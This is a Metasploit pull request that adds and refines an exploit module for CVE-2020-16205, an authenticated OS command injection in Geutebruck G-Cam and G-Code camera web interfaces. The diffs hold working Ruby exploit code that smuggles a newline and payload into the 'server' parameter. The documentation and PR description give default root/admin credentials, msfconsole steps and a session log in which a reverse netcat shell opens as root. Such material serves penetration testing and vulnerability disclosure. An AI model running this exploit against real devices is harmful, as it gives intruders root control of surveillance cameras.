### PR TITLE
Add CVE-2020-16205 exploit for Geutebruck G-CAM

### DIFF
--- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -42,8 +42,8 @@ Users can find additional details of this vulnerability on the advisory page at 
   1. Start the camera using default configuration
   2. Launch msfconsole
   3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
-  4. Do: `set httpusername root`
-  5. Do: `set httppassword admin`
+  4. Do: `set httpusername <camera_username>`
+  5. Do: `set httppassword <camera_password>`
   6. Do: `set lhost <metasploit_ip>`
   5. Do: `set rhosts <camera_ip>`
   6. Do: `set payload cmd/unix/reverse_netcat_gaping`

--- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -1,10 +1,10 @@
 ## Vulnerable Application
 
-The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
+The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5:
 Encoder and E2 Series Camera models:
-G-Code: 
+G-Code:
  EEC-2xxx
-G-Cam: 
+G-Cam:
  EBC-21xx
  EFD-22xx
  ETHC-22xx
@@ -27,7 +27,7 @@ This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.
 
 ### Description
 
-This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
+This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface.
 Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
 
 ## Verification Steps

--- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -1,0 +1,68 @@
+## Vulnerable Application
+
+[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
+G-Code: 
+ EEC-2xxx
+G-Cam: 
+ EBC-21xx
+ EFD-22xx
+ ETHC-22xx
+ EWPC-22xx
+
+### Description
+
+This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
+Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
+Tested it with the 1.12.14.5 firmware only.
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+  1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
+  2. Do: `set httpusername root`
+  3. Do: `set httppassword admin`
+  4. Do: `set lhost 192.168.14.1`
+  5. Do: `set rhosts 192.168.14.58`
+  6. Do: `set payload cmd/unix/reverse_netcat_gaping`
+  7. Do: `check`
+  8. Do: `exploit`
+
+## Options
+
+ ### HTTPUSERNAME
+
+ A username used to authenticate on the admin page. **Default: root**
+
+ ### HTTPPASSWORD
+
+The password of the username used to authenticate on the admin page. **Default: admin**
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/geutebruck_testaction_exec
+msf5 exploit(linux/http/geutebruck_testaction_exec) >
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
+httpusername => root
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
+httppassword => admin
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
+lhost => 192.168.14.1
+msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
+rhosts => 192.168.14.58
+msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.14.1:4444
+[*] 192.168.14.58:80 - Attempting to exploit...
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
+pwd
+
+/tmp/www_ramdisk/uapi-cgi/admin
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
+```

--- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -1,34 +1,41 @@
 ## Vulnerable Application
 
-The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5:
-Encoder and E2 Series Camera models:
-G-Code:
- EEC-2xxx
-G-Cam:
- EBC-21xx
- EFD-22xx
- ETHC-22xx
- EWPC-22xx
+The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,
+firmware version 1.12.13.2 or firmware version 1.12.14.5:
+* Encoder and E2 Series Camera models:
+  * G-Code:
+    * EEC-2xxx
+  * G-Cam:
+    * EBC-21xx
+    * EFD-22xx
+    * ETHC-22xx
+    * EWPC-22xx
 
 Many brands use the same firmware:
-UDP Technology (which is also the supplier of the firmware for the other vendors)
-Ganz
-Visualint
-Cap
-THRIVE Intelligence
-Sophus
-VCA
-TripCorps
-Sprinx Technologies
-Smartec
-Riva
+  * UDP Technology (which is also the supplier of the firmware for the other vendors)
+  * Ganz
+  * Visualint
+  * Cap
+  * THRIVE Intelligence
+  * Sophus
+  * VCA
+  * TripCorps
+  * Sprinx Technologies
+  * Smartec
+  * Riva
 
-This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
+This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
 
 ### Description
 
-This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface.
-Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
+This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the
+`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
+This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
+inject a new line character, followed by the command they wish to execute, at which point the server will
+then interpret the new string as a separate command to be executed. Successful exploitation will result in
+remote code execution as the `root` user.
+
+Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.
 
 ## Verification Steps
 
@@ -58,7 +65,6 @@ The password of the username used to authenticate on the admin page. **Default: 
 
 ```
 msf5 > use exploit/linux/http/geutebruck_testaction_exec
-msf5 exploit(linux/http/geutebruck_testaction_exec) >
 msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
 payload => cmd/unix/reverse_netcat_gaping
 msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root

--- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -1,6 +1,7 @@
 ## Vulnerable Application
 
-[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
+The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
+Encoder and E2 Series Camera models:
 G-Code: 
  EEC-2xxx
 G-Cam: 
@@ -9,33 +10,48 @@ G-Cam:
  ETHC-22xx
  EWPC-22xx
 
+Many brands use the same firmware:
+UDP Technology (which is also the supplier of the firmware for the other vendors)
+Ganz
+Visualint
+Cap
+THRIVE Intelligence
+Sophus
+VCA
+TripCorps
+Sprinx Technologies
+Smartec
+Riva
+
+This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
+
 ### Description
 
 This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
 Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
-Tested it with the 1.12.14.5 firmware only.
 
 ## Verification Steps
 
-List the steps needed to make sure this thing works
-
-  1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
-  2. Do: `set httpusername root`
-  3. Do: `set httppassword admin`
-  4. Do: `set lhost 192.168.14.1`
-  5. Do: `set rhosts 192.168.14.58`
+  1. Start the camera using default configuration
+  2. Launch msfconsole
+  3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
+  4. Do: `set httpusername root`
+  5. Do: `set httppassword admin`
+  6. Do: `set lhost <metasploit_ip>`
+  5. Do: `set rhosts <camera_ip>`
   6. Do: `set payload cmd/unix/reverse_netcat_gaping`
-  7. Do: `check`
+  7. Do: `check` to be sure the target is vulnerable
   8. Do: `exploit`
+  9. You should get a shell
 
 ## Options
 
- ### HTTPUSERNAME
+The default credentials to log on the web interface are root/admin.
 
+ ### HTTPUSERNAME
  A username used to authenticate on the admin page. **Default: root**
 
  ### HTTPPASSWORD
-
 The password of the username used to authenticate on the admin page. **Default: admin**
 
 ## Scenarios

--- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
@@ -62,7 +62,7 @@ The default credentials to log on the web interface are root/admin.
 The password of the username used to authenticate on the admin page. **Default: admin**
 
 ## Scenarios
-
+### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
 ```
 msf5 > use exploit/linux/http/geutebruck_testaction_exec
 msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
       'Description'    => %q{
-        This module exploits a an arbitrary command execution vulnerability. The
+        This module exploits an arbitrary command execution vulnerability. The
         vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
         authenticated user to execute arbitrary commands with root privileges.
         with web user privileges. Firmware <= 1.12.14.5 are concerned.

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -1,83 +1,85 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GoodRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  
+
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
-      'Description'    => %q{
-        This module exploits an arbitrary command execution vulnerability. The
-        vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
-        authenticated user to execute arbitrary commands with root privileges.
-        with web user privileges. Firmware <= 1.12.14.5 are concerned.
-        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
-      },
-      'Author'         =>
-        [
-          'Davy Douhine'
+    super(
+      update_info(
+        info,
+        'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
+        'Description' => %q{
+          This module exploits an arbitrary command execution vulnerability. The
+          vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
+          authenticated user to execute arbitrary commands with root privileges.
+          Firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned.
+          Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
+        },
+        'Author' =>
+          [
+            'Davy Douhine'
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'CVE', '2020-16205' ],
+            [ 'URL', 'http://geutebruck.com' ],
+            [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ],
+            [ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ]
+          ],
+        'DisclosureDate' => 'May 20 2020',
+        'Privileged' => true,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Targets' => [
+          [ 'Automatic Target', {} ]
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2020-16205' ],
-          [ 'URL', 'http://geutebruck.com' ],
-          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
-        ],
-      'DisclosureDate' => 'May 20 2020',
-      'Privileged'     => true,
-      'Platform'            => ['unix', 'linux'],
-      'Arch'                => [ARCH_ARMLE],
-      'Targets'              => [
-        [ 'Automatic Target', { } ]
-      ],
-      'DefaultTarget'  => 0,
-      'DefaultOptions'      =>
-       {
-          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
-        }
-      ))
+        'DefaultTarget' => 0,
+        'DefaultOptions' =>
+         {
+           'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+         }
+      )
+    )
 
     register_options(
       [
         OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
         OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
         OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
-      ])
+      ]
+    )
   end
 
   def check
-      begin
-        res = send_request_cgi(
-          'method' => 'GET',
-          'uri' => '/brand.xml',
-          'query' => "",
-        )
-        if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5"))
-          return CheckCode::Vulnerable
-        end
-      rescue ::Rex::ConnectionError
-        return CheckCode::Unknown
+    begin
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => '/brand.xml'
+      )
+      if res && (res.body.include?('1.12.0.25') || res.body.include?('1.12.13.2') || res.body.include?('1.12.14.5'))
+        return CheckCode::Vulnerable
       end
-      CheckCode::Safe
+    rescue ::Rex::ConnectionError
+      return CheckCode::Unknown
     end
+    CheckCode::Safe
+  end
 
   def exploit
-    user = datastore['HttpUsername']
-    pass = datastore['HttpPassword']
     print_status("#{rhost}:#{rport} - Attempting to exploit...")
-    res = send_request_cgi(
+    send_request_cgi(
       {
-        'method'   => 'GET',
-        'uri'      => target_uri.path,
+        'method' => 'GET',
+        'uri' => target_uri.path,
         'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" }
-    })
+      }
+    )
   end
 
 end

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
         'Description' => %q{
-          This module exploits an authenticated arbitrary command execution vulnerability within the
-          /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, 
-          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware 
-          versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as
-          the root user.
+          This module exploits an authenticated arbitrary command execution vulnerability within the 'server'
+          GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
+          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware
+          versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'.
+          Successful exploitation results in remote code execution as the root user.
         },
         'Author' =>
           [

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -14,15 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
         'Description' => %q{
-          This module exploits an arbitrary command execution vulnerability. The
-          vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
-          authenticated user to execute arbitrary commands with root privileges.
-          Firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned.
-          Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
+          This module exploits an authenticated arbitrary command execution vulnerability within the
+          /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, 
+          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware 
+          versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as
+          the root user.
         },
         'Author' =>
           [
-            'Davy Douhine'
+            'Davy Douhine' # ddouhine
           ],
         'License' => MSF_LICENSE,
         'References' =>

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     result = firmware
-    return result unless result.true?
+    return result unless result == true
 
     version = Gem::Version.new(@version)
     vprint_status "Found Geutebruck version #{version}"

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -20,6 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
           versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'.
           Successful exploitation results in remote code execution as the root user.
         },
+
         'Author' =>
           [
             'Davy Douhine' # ddouhine
@@ -56,18 +57,33 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check
+  def firmware
     begin
       res = send_request_cgi(
         'method' => 'GET',
         'uri' => '/brand.xml'
       )
-      if res && (res.body.include?('1.12.0.25') || res.body.include?('1.12.13.2') || res.body.include?('1.12.14.5'))
-        return CheckCode::Vulnerable
+      unless res
+        vprint_error 'Connection failed'
+        return CheckCode::Unknown
       end
-    rescue ::Rex::ConnectionError
-      return CheckCode::Unknown
+
+      res_xml = res.get_xml_document
+      @version = res_xml.at('//firmware').text
+      return true
     end
+  end
+
+  def check
+    firmware
+    version = Gem::Version.new(@version)
+    vprint_status "Found Geutebruck version #{version}"
+    if version < Gem::Version.new('1.12.0.25') ||
+       version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
+
+      return CheckCode::Appears
+    end
+
     CheckCode::Safe
   end
 

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -70,16 +70,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
       res_xml = res.get_xml_document
       @version = res_xml.at('//firmware').text
+      return true
     end
   end
 
   def check
-    firmware
+    result = firmware
+    return result unless result.true?
+
     version = Gem::Version.new(@version)
     vprint_status "Found Geutebruck version #{version}"
-    if version < Gem::Version.new('1.12.0.25') ||
-       version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
-
+    if version < Gem::Version.new('1.12.0.25') || Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
       return CheckCode::Appears
     end
 
@@ -96,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
   end
-
 end

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = Gem::Version.new(@version)
     vprint_status "Found Geutebruck version #{version}"
-    if version < Gem::Version.new('1.12.0.25') || Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
+    if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
       return CheckCode::Appears
     end
 

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a an arbitrary command execution vulnerability. The
+        vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
+        authenticated user to execute arbitrary commands with root privileges.
+        with web user privileges. Firmware <= 1.12.14.5 are concerned.
+        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
+      },
+      'Author'         =>
+        [
+          'Davy Douhine'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2020-16205' ],
+          [ 'URL', 'http://geutebruck.com' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
+        ],
+      'DisclosureDate' => 'May 20 2020',
+      'Privileged'     => true,
+      'Platform'            => ['unix', 'linux'],
+      'Arch'                => [ARCH_ARMLE],
+      'Targets'              => [
+        [ 'Automatic Target', { } ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions'      =>
+       {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+        }
+      ))
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
+        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
+        OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
+      ], self.class)
+  end
+
+  def check
+      begin
+        res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => '/brand.xml',
+          'query' => "",
+        )
+        if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5"))
+          return CheckCode::Vulnerable
+        end
+      rescue ::Rex::ConnectionError
+        return CheckCode::Unknown
+      end
+      CheckCode::Safe
+    end
+
+  def exploit
+    user = datastore['HttpUsername']
+    pass = datastore['HttpPassword']
+    header = "type=ntp&server=%0a"
+    uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")
+    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    res = send_request_raw(
+      {
+        'method' => 'GET',
+        'uri'    => uri
+    })
+  end
+
+end

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -71,13 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     user = datastore['HttpUsername']
     pass = datastore['HttpPassword']
-    header = "type=ntp&server=%0a"
-    uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")
     print_status("#{rhost}:#{rport} - Attempting to exploit...")
-    res = send_request_raw(
+    res = send_request_cgi(
       {
-        'method' => 'GET',
-        'uri'    => uri
+        'method'   => 'GET',
+        'uri'      => target_uri.path,
+        'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" }
     })
   end
 

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -70,7 +70,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
       res_xml = res.get_xml_document
       @version = res_xml.at('//firmware').text
-      return true
     end
   end
 

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
         OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
         OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
-      ], self.class)
+      ])
   end
 
   def check


### PR DESCRIPTION
This exploit a simple OS command injection (CVE-2020-16205) in the web interface of the [Geutebruck](https://www.geutebrueck.com) G-Cam and G-Code products.

Many brands use the same firmware:

- UDP Technology (which is also the supplier of the firmware for the other vendors)
- Ganz
- Visualint
- Cap
- THRIVE Intelligence
- Sophus
- VCA
- TripCorps
- Sprinx Technologies
- Smartec
- Riva 

Unfortunately I haven't been able to test this module against any of them except Geutebruck.

Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 and a blogpost about the issue: https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/

A web server runs on the product to offer video streaming and configuration management and the web interface have an OS command injection vulnerability in the `/uapi-cgi/admin/testaction.cgi` page used for the TCP/IP configuration.
The setup pages need authentication to be reached but so its not a CVSS 10 but the credentials are not randomized (root/admin by default).
When exploited the vulnerability gives you a root access.

 The following firmware are vulnerable:
- 1.12.0.25 and prior
- 1.12.13.2
- 1.12.14.5

I've tested it with the 1.12.14.5 firmware only and I've provided you the PCAP by mail.

ps: it's my first module since _many_ years so I guess a few things will be incorrect/missing.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/geutebruck_testaction_exec`
- [ ]  set credentials (root/admin by default):
- [ ] `set httpusername root`
- [ ] `set httppassword admin`
- [ ] `set lhost 192.168.14.1`
- [ ] `set rhosts 192.168.14.58`
- [ ] `set payload cmd/unix/reverse_netcat_gaping`
- [ ] check should return true for vulnerable targets:
- [ ] `check`
- [ ] if the target is vulnerable a session should pop when launching exploit
- [ ] `exploit`


## Demonstration

- [ ]  check against a vulnerable target (1.12.14.5):
![Screenshot 2020-08-12 at 10 54 34](https://user-images.githubusercontent.com/4519330/89995808-4e91d880-dc8a-11ea-8422-9d8448194601.png)
- [ ]  check against a non vulnerable target (1.12.0.27):
![Screenshot 2020-08-12 at 10 54 44](https://user-images.githubusercontent.com/4519330/89997983-38d1e280-dc8d-11ea-9ed2-c806b7057083.png)

- [ ]  exploitation:
```
msf5 > use exploit/linux/http/geutebruck_testaction_exec
msf5 exploit(linux/http/geutebruck_testaction_exec) >
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
httpusername => root
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
httppassword => admin
msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit

[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Attempting to exploit...
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
pwd

/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
```


<img width="781" alt="exploit_msf_geute_testaction_2020" src="https://user-images.githubusercontent.com/4519330/89924559-7d646c00-dc02-11ea-95f4-710b89f547bb.png">

